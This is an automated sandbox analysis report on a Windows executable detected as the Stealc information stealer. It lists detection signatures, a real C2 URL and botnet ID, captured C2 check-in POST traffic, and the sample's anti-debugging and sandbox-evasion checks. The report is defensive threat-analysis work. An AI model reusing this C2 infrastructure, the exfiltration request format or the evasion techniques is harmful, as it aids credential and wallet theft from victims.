Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1541160
MD5:efb3596cf052ae112e2b81b16870436e
SHA1:266b9c7ace3a1371ef5e87eb55f4e65ecb5e2d57
SHA256:73de19773f529e65c1935196f7eb61206dad5ad17783a4412543c4bf0325bdc6
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EFB3596CF052AE112E2B81B16870436E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7264JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7264JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.910000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T14:18:02.241179+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.910000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0091C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00919AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00919AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00917240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00917240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00919B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00919B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00928EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00924910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0091DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0091E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0091ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00924570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00923EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0091BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"6977C7B1D24A563484146------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"doma------EBAFBGIDHCBFHIECFCBG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00914880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"6977C7B1D24A563484146------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"doma------EBAFBGIDHCBFHIECFCBG--
                Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/0
                Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/G
                Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
                Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C260C70_2_00C260C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D80_2_00CE29D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDD9A40_2_00CDD9A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C9360_2_00B9C936
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDF96C0_2_00CDF96C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB397A0_2_00BB397A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C601150_2_00C60115
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2A9270_2_00C2A927
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE4AAA0_2_00CE4AAA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B94BE10_2_00B94BE1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6248D0_2_00C6248D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA4760_2_00CDA476
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA8D080_2_00BA8D08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE0E930_2_00CE0E93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5EEA20_2_00D5EEA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8860C0_2_00B8860C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF3E4A0_2_00BF3E4A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C10F570_2_00C10F57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDBF1E0_2_00CDBF1E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009145C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: enilkfvu ZLIB complexity 0.9950591473636087
                Source: file.exe, 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00928680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00923720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00923720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\VQR1X6ZM.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1836032 > 1048576
                Source: file.exeStatic PE information: Raw size of enilkfvu is bigger than: 0x100000 < 0x19a200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00929860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c2667 should be: 0x1c4d05
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: enilkfvu
                Source: file.exeStatic PE information: section name: cjtkqast
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C260C7 push 0108C592h; mov dword ptr [esp], esi0_2_00C26316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCE8D9 push esi; mov dword ptr [esp], ebx0_2_00DCE90F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC18C4 push eax; mov dword ptr [esp], ecx0_2_00DC18DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE3090 push esi; mov dword ptr [esp], ebx0_2_00BE3180
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE3090 push edi; mov dword ptr [esp], esi0_2_00BE3184
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE3090 push ebp; mov dword ptr [esp], ecx0_2_00BE31B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9D848 push ebp; mov dword ptr [esp], 53967580h0_2_00D9D8A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092B035 push ecx; ret 0_2_0092B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCB06C push 52FB224Ch; mov dword ptr [esp], edx0_2_00DCB0DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFD03D push esi; mov dword ptr [esp], 1F9A9466h0_2_00DFD0DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7683E push ecx; mov dword ptr [esp], edx0_2_00D7686F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEB02D push 192B211Ch; mov dword ptr [esp], ecx0_2_00DEB03F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEB02D push ebx; mov dword ptr [esp], ebp0_2_00DEB17E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEB02D push eax; mov dword ptr [esp], esi0_2_00DEB1B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEB02D push 7B17890Dh; mov dword ptr [esp], eax0_2_00DEB1E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEB02D push esi; mov dword ptr [esp], esp0_2_00DEB1E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D78021 push edi; mov dword ptr [esp], esp0_2_00D7807A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D78021 push 435E7A54h; mov dword ptr [esp], ecx0_2_00D7813B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D78021 push edi; mov dword ptr [esp], edx0_2_00D7817D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEC1C8 push 12D63B6Ah; mov dword ptr [esp], edi0_2_00CEC1F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEC1C8 push 5765917Fh; mov dword ptr [esp], esi0_2_00CEC275
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEA9D5 push ebx; mov dword ptr [esp], ecx0_2_00DEAA1A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push 24F38F98h; mov dword ptr [esp], ebp0_2_00CE29FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push ecx; mov dword ptr [esp], 377D5128h0_2_00CE2A01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edi0_2_00CE2A89
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push esi; mov dword ptr [esp], ebx0_2_00CE2B27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push 0B20A511h; mov dword ptr [esp], esi0_2_00CE2B68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edx0_2_00CE2C02
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push 2DA0F3D7h; mov dword ptr [esp], eax0_2_00CE2C86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push 5F6B3B2Dh; mov dword ptr [esp], esi0_2_00CE2CA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE29D8 push 662C787Ah; mov dword ptr [esp], edx0_2_00CE2CE1
                Source: file.exeStatic PE information: section name: enilkfvu entropy: 7.954611061577171

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00929860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13599
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD530 second address: CDD534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD534 second address: CDD547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jno 00007F1674F90E16h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD547 second address: CDD564 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DACh 0x00000008 pushad 0x00000009 jl 00007F1675279DA6h 0x0000000f jns 00007F1675279DA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEBFBE second address: CEBFC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEBFC4 second address: CEBFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEBFCA second address: CEBFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC173 second address: CEC185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DAEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC185 second address: CEC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEAFB second address: CEEB0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
